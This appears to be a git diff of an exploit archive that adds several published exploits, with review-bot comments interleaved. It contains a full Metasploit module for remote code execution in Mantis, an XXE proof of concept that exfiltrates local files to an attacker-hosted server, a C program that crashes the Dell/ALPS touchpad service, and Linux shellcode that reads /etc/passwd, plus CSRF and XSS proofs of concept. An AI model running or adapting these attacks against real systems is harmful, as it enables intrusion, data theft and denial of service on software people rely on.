diff --git a/exploits/hardware/webapps/44606.html b/exploits/hardware/webapps/44606.html new file mode 100644 index 000000000..2c78c3c70 --- /dev/null +++ b/exploits/hardware/webapps/44606.html @@ -0,0 +1,42 @@ +# Exploit Title: Fastweb FASTgate 0.00.47 CSRF +# Date: 09-05-2018 +# Exploit Authors: Raffaele Sabato +# Contact: https://twitter.com/syrion89 +# Vendor: Fastweb +# Product Web Page: http://www.fastweb.it/adsl-fibra-ottica/dettagli/modem-fastweb-fastgate/ +# Version: 0.00.47 +# CVE: CVE-2018-6023 + +I DESCRIPTION +======================================================================== + +An issue was discovered in Fastweb FASTgate 0.00.47 device. A Cross-site request forgery (CSRF) vulnerability allows remote attackers to hijack the authentication of users for requests that modify the configuration. This vulnerability may lead to Gues Wi-Fi activating, Wi-Fi password changing, etc. +The vulnerability was disclosed to Fastweb on 19 January 2018. +Fastweb independently patched customer devices with non-vulneable version .67 from December 2017 thru March 2018. + +II PROOF OF CONCEPT +======================================================================== + +## Activate Gues Wi-Fi: + + + + +
+ + + + + + + + + + +
+ + + +III REFERENCES +======================================================================== +http://www.fastweb.it/myfastpage/assistenza/guide/FASTGate/ \ No newline at end of file diff --git a/exploits/java/webapps/44607.txt b/exploits/java/webapps/44607.txt new file mode 100644 index 000000000..c2a524288 --- /dev/null +++ b/exploits/java/webapps/44607.txt 
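Review bot: The description text has typos that the index entry inherits: `Gues Wi-Fi` (both in the description sentence and in the `## Activate Gues Wi-Fi:` heading) should read `Guest Wi-Fi`, `non-vulneable` should read `non-vulnerable`, and `thru` should read `through`. The form markup between that heading and `III REFERENCES` shows only as blank added lines in this view, so the request body itself could not be reviewed here. The file is stored as `.html` but opens with `#`-prefixed header lines that a browser renders as visible text; wrapping that header in an HTML comment would keep the PoC page clean when opened.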
@@ -0,0 +1,53 @@ +[+] Exploit Title: ModbusPal XXE Injection +[+] Date: 05-08-2018 +[+] Exploit Author: Trent Gordon +[+] Vendor Homepage: http://modbuspal.sourceforge.net/ +[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files +[+] Version: 1.6b +[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151 +[+] CVE: CVE-2018-10832 + +1. Vulnerability Description + +ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker. + +2. Proof of Concept + +a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml) + +b.) Contents of hosted "evil.xml" + + +"> + +c.) Example Exploited "xxe.xmpa" + + + + + + + +%sp; + +%param1; + +]> + +&exfil; + + + + + + + + + + + +3. Additional Details + +Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '/n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd. \ No newline at end of file diff --git a/exploits/php/remote/44611.rb b/exploits/php/remote/44611.rb new file mode 100755 index 000000000..ef2dbfc9f --- /dev/null +++ b/exploits/php/remote/44611.rb 
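Review bot: Section 3 explains the Java-side defence but gives no remediation for ModbusPal itself; a line stating that the fix is to disable DTD and external-entity processing in the parser that loads `.xmpp`/`.xmpa` files (e.g. setting the `http://apache.org/xml/features/disallow-doctype-decl` feature to true on the `DocumentBuilderFactory`) would help readers triaging this. The same paragraph says `Java 1.7 contains certain defenses` while the header says the test ran on `Java 1.8.0_151`; `Java 1.7 and later` would remove the ambiguity. `'/n'` should read `'\n'` and `dont` should read `don't`. The hosted `evil.xml` and the `xxe.xmpa` sample appear only as blank added lines in this view, so their content could not be checked.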
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Mantis manage_proj_page PHP Code Execution',
+ 'Description' => %q{
+ Mantis v1.1.3 and earlier are vulnerable to a post-authentication Remote
+ Code Execution vulnerability in the sort parameter of the
+ manage_proj_page.php page.
+ },
+ 'Author' => [
+ 'EgiX', # Exploit-DB Entry Author
+ 'Lars Sorenson' # MSF module author
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['EDB', '6768'],
+ ['CVE', '2008-4687'],
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Mantis <= 1.1.3', { } ],
+ ],
+ 'DisclosureDate' => 'Oct 16, 2008',
+ 'DefaultTarget' => 0))
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path to the Mantis installation', '/mantisbt/']),
+ OptString.new('USERNAME', [true, 'The username to log in as', 'administrator']),
+ OptString.new('PASSWORD', [true, 'The password to log in with', 'root']),
+ ])
+ end
+
+ def check
+ vprint_status('Checking Mantis version ...')
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'login_page.php'),
+ 'method' => 'GET'
+ })
+
+ unless res
+ vprint_error('Connection to host failed!')
+ return CheckCode::Unknown
+ end
+
+ unless res.body =~ /Mantis ([0-9]+\.[0-9]+\.[0-9]+)/
+ vprint_error('Cannot determine Mantis version!')
+ return CheckCode::Unknown
+ end
+
+ version = Gem::Version.new(Regexp.last_match[1])
+
+ vprint_status("Mantis version #{version} detected")
+
+ if res.code == 200 && version <= Gem::Version.new('1.1.3')
+ return CheckCode::Appears
+ end
+
+ CheckCode::Safe
+ end
+
+ def login
+ vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'login_page.php'),
+ })
+ unless res
+ fail_with(Failure::Unreachable, 'Cannot access host to log in!')
+ end
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'login.php'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'username': datastore['username'],
+ 'password': datastore['password'],
+ },
+ 'cookie'=> "PHPSESSID=#{res.get_cookies}"
+ })
+ unless res
+ fail_with(Failure::Unknown, 'Cannot access host to log in!')
+ end
+
+ fail_with(Failure::Unreachable, 'Login failed!') unless res.code == 302
+ fail_with(Failure::NoAccess, 'Wrong credentials!') if res.redirection.to_s.include?('login_page.php')
+
+ store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+ res.get_cookies
+ end
+
+ def exploit
+ fail_with(Failure::NotVulnerable, 'Target is not vulnerable!') unless check == CheckCode::Appears
+
+ cookie = login
+ vprint_status('Sending payload ...')
+ payload_b64 = Rex::Text.encode_base64(payload.encoded)
+ data = {
+ 'sort' => "']);}error_reporting(0);print(_code_);eval(base64_decode($_SERVER[HTTP_CMD]));die();#",
+ }
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, 'manage_proj_page.php'),
+ 'method' => 'POST',
+ 'vars_post' => data,
+ 'headers' => {
+ 'Connection': 'close',
+ 'Cookie': cookie.to_s,
+ 'Cmd': payload_b64
+ }
+ })
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/44608.txt b/exploits/php/webapps/44608.txt
new file mode 100644
index 000000000..afd729942
--- /dev/null
+++ b/exploits/php/webapps/44608.txt
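Review bot: `login` echoes the configured password to the console: `vprint_status("Logging in as #{datastore['username']}:#{datastore['password']} ... ")` puts the secret into verbose output and into any session log; `vprint_status("Logging in as #{datastore['USERNAME']} ...")` carries the same debugging information without the credential. The same method reads `datastore['username']`/`datastore['password']` in three places but `datastore['USERNAME']`/`datastore['PASSWORD']` in the `store_valid_credential` call; the datastore lookup is case-insensitive so both resolve, but the option names registered in `initialize` should be used consistently. `'cookie'=>` also lacks the space before `=>` used on every other hash pair in the module.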
@@ -0,0 +1,28 @@
+# Exploit Title: MyBB Latest Posts on Profile Plugin v1.1 - Cross-Site Scripting
+# Date: 4/20/2018
+# Author: 0xB9
+# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
+# Software Link: https://community.mybb.com/mods.php?action=view&pid=914
+# Version: 1.1
+# Tested on: Ubuntu 17.10
+# CVE: CVE-2018-10580
+
+
+1. Description:
+Adds a new section to user profiles that will display their last posts.
+
+
+2. Proof of Concept:
+
+Persistent XSS
+- Create a thread with the following subject
+- Now visit your profile to see the alert.
+
+
+3. Solution:
+I reported the plugin twice over the past 3 weeks and recieved no response.
+
+
+The following should be added in line 236 to properly sanitize thread subjects.
+
+$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);
\ No newline at end of file
diff --git a/exploits/windows/dos/44610.c b/exploits/windows/dos/44610.c
new file mode 100644
index 000000000..bf24f5ee6
--- /dev/null
+++ b/exploits/windows/dos/44610.c
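Review bot: The remediation in section 3 cites `line 236` without naming the plugin file that contains the `$d['tsubject']` assignment, so a reader cannot locate where `$d['tsubject'] = htmlspecialchars_uni($d['tsubject']);` is meant to go; adding the file path next to the line number would make the fix actionable. The thread subject used in section 2 appears only as a blank in this view, so the PoC step could not be checked. `recieved` in section 3 should read `received`.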
@@ -0,0 +1,112 @@
+/*
+Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
+Author: Souhail Hammou
+Vendor Homepage: https://www.alps.com/
+Tested on : Alps Pointing-device Driver 10.1.101.207
+CVE: CVE-2018-10828
+*/
+
+#include
+#include
+#include
+
+/*
+Details:
+==========
+ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc
+allows the current user to map and write to the "ApMsgFwd File Mapping Object" section.
+ApMsgFwd.exe uses the data written to the section as arguments to functions.
+This causes a denial of service condition when invalid pointers are written to the mapped section.
+
+The crash :
+===========
+(b88.aa0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+0:004> r
+rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
+rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
+rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
+ r8=0000000000000000 r9=00000000ffffffff r10=0000000000000000
+r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
+r14=0000000000000000 r15=0000000000563e40
+iopl=0 nv up ei pl zr na po nc
+cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
+KERNELBASE!MultiByteToWideChar+0x3d8:
+00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
+
+
+0:001> lm v m ApMsgFwd
+Browse full module list
+start end module name
+00000000`00400000 00000000`00415000 ApMsgFwd (no symbols)
+ Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
+ Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
+ Image name: ApMsgFwd.exe
+ Browse all global symbols functions data
+ Timestamp: Tue Jul 1 09:03:05 2014 (53B27949)
+ CheckSum: 00020F5D
+ ImageSize: 00015000
+ File version: 8.1.0.44
+ Product version: 8.1.0.44
+ File flags: 0 (Mask 3F)
+ File OS: 40004 NT Win32
+ File type: 1.0 App
+ File date: 00000000.00000000
+ Translations: 0411.04b0
+ CompanyName: Alps Electric Co., Ltd.
+ ProductName: ApMsgFwd
+ InternalName: ApMsgFwd
+ OriginalFilename: ApMsgFwd.exe
+ ProductVersion: 8, 1, 0, 44
+ FileVersion: 8, 1, 0, 44
+ PrivateBuild: 8, 1, 0, 44
+ SpecialBuild: 8, 1, 0, 44
+ FileDescription: ApMsgFwd
+ LegalCopyright: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+ LegalTrademarks: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+ Comments: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
+*/
+int main(int argc, char** argv)
+{
+ HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
+ PBYTE MappedBuf;
+
+ if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
+ {
+ printf("OpenFileMapping Failed !\n");
+ goto ret;
+ }
+
+ if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
+ {
+ printf("MapViewOfFile Failed !\n");
+ goto cleanup_0;
+ }
+
+ StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");
+
+ if ( ! StartEvtHnd )
+ {
+ printf("OpenEvent Failed !\n");
+ goto cleanup_1;
+ }
+
+ ZeroMemory(MappedBuf,0x1A0);
+ *MappedBuf = 9; //switch case 9
+ *(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
+ *(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;
+
+ /*Wake up the waiting thread*/
+ SetEvent(StartEvtHnd);
+
+ CloseHandle(StartEvtHnd);
+cleanup_1:
+ UnmapViewOfFile(MappedBuf);
+cleanup_0:
+ CloseHandle(ApMpHnd);
+ret:
+ return 0;
+}
\ No newline at end of file
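Review bot: `main` returns 0 on every path, including the three failure branches that `goto` the cleanup labels, so a caller cannot distinguish a failed `OpenFileMappingA`/`MapViewOfFile`/`OpenEventA` from a completed run; declaring `int rc = 1;` alongside the handles, setting `rc = 0;` after the `CloseHandle(StartEvtHnd)` call and ending with `return rc;` at `ret:` fixes that. `KeyHnd` is declared but never used and `argc`/`argv` are unused, so `int main(void)` with `HANDLE ApMpHnd, StartEvtHnd;` is sufficient. The return value of `SetEvent` is discarded as well. The three `#include` lines show no header name in this view, presumably lost in rendering; the code needs at least `<windows.h>` and `<stdio.h>`.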
diff --git a/exploits/windows/webapps/44497.txt b/exploits/windows/webapps/44497.txt
index df89b19d3..c831b00ef 100644
--- a/exploits/windows/webapps/44497.txt
+++ b/exploits/windows/webapps/44497.txt
@@ -3,6 +3,8 @@
 # Software Vendor: NComputing
 # Software Link:
 # Author: Javier Bernardo
+# Contact: javier@kwell.net
+# Website: http://www.kwell.net
 # CVE: CVE-2018-10201
 # Category: Webapps
diff --git a/files_exploits.csv b/files_exploits.csv
index ebeca03fd..d44265b8c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5968,6 +5968,7 @@ id,file,description,date,author,type,platform,port
 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
 44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
 44605,exploits/windows/dos/44605.py,"Allok Video Splitter 3.1.12.17 - Denial of Service",2018-05-09,Achilles,dos,windows,
+44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16480,6 +16481,7 @@ id,file,description,date,author,type,platform,port
 44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
 44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - manage_proj_page PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39292,3 +39294,6 @@ id,file,description,date,author,type,platform,port
 44587,exploits/php/webapps/44587.txt,"IceWarp Mail Server < 11.1.1 - Directory Traversal",2018-05-04,"Trustwave's SpiderLabs",webapps,php,
 44589,exploits/linux/webapps/44589.txt,"CSP MySQL User Manager 2.3.1 - Authentication Bypass",2018-05-06,"Youssef Mami",webapps,linux,
 44595,exploits/php/webapps/44595.rb,"WordPress Plugin User Role Editor < 4.25 - Privilege Escalation",2018-05-06,"Tomislav Paskalev",webapps,php,
+44606,exploits/hardware/webapps/44606.html,"Fastweb FASTGate 0.00.47 - Cross-site Request Forgery",2018-05-10,"Raffaele Sabato",webapps,hardware,
+44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
+44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3dfea168b..fbd0d2cf0 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -882,3 +882,4 @@ id,file,description,date,author,type,platform
 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
 44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
 44602,shellcodes/linux_x86/44602.c,"Linux/x86 - Bind TCP (9443/TCP) Shell + fork() + Null-Free Shellcode (113 bytes)",2018-05-09,"Amine Kanane",shellcode,linux_x86
+44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44609.c b/shellcodes/linux_x86/44609.c
new file mode 100644
index 000000000..44fad83b5
--- /dev/null
+++ b/shellcodes/linux_x86/44609.c
@@ -0,0 +1,66 @@
+/*
+; Title : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
+; Date : May, 2018
+; Author : Nuno Freitas
+; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
+; Twitter : @nunof11
+; SLAE ID : SLAE-1112
+; Size : 62 bytes
+; Tested on : i686 GNU/Linux
+
+section .text
+
+global _start
+
+_start:
+ xor eax, eax
+ jmp two
+
+one:
+ pop ebx
+ mov al, 0x5
+ int 0x80
+ mov esi, eax
+ jmp read
+
+exit:
+ mov al, 0x1
+ xor ebx, ebx
+ int 0x80
+
+read:
+ mov ebx, esi
+ mov al, 0x3
+ mov ecx, esp
+ mov dl, 0x01
+ int 0x80
+
+ xor ebx, ebx
+ cmp eax, ebx
+ je exit
+
+ mov al, 0x4
+ mov bl, 0x1
+ int 0x80
+
+ inc esp
+ jmp read
+
+two:
+ call one
+ string: db "/etc/passwd"
+*/
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+void main()
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
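Review bot: The commented assembly listing opens with `xor eax, eax` / `jmp two`, but the byte string it documents begins with `\x31\xc9\xf7\xe1`, which decodes to `xor ecx, ecx` / `mul ecx`; the remaining bytes follow the listing, so the first two instructions in the comment should be updated to match the encoded variant. In the test harness, `void main()` is not a conforming C signature and `printf("Shellcode Length: %d\n", strlen(shellcode))` passes a `size_t` to `%d`, which is undefined behaviour under `-Wformat`; `int main(void)` and `%zu` fix both. The two `#include` lines show no header name in this view, presumably lost in rendering; the code needs `<stdio.h>` and `<string.h>`.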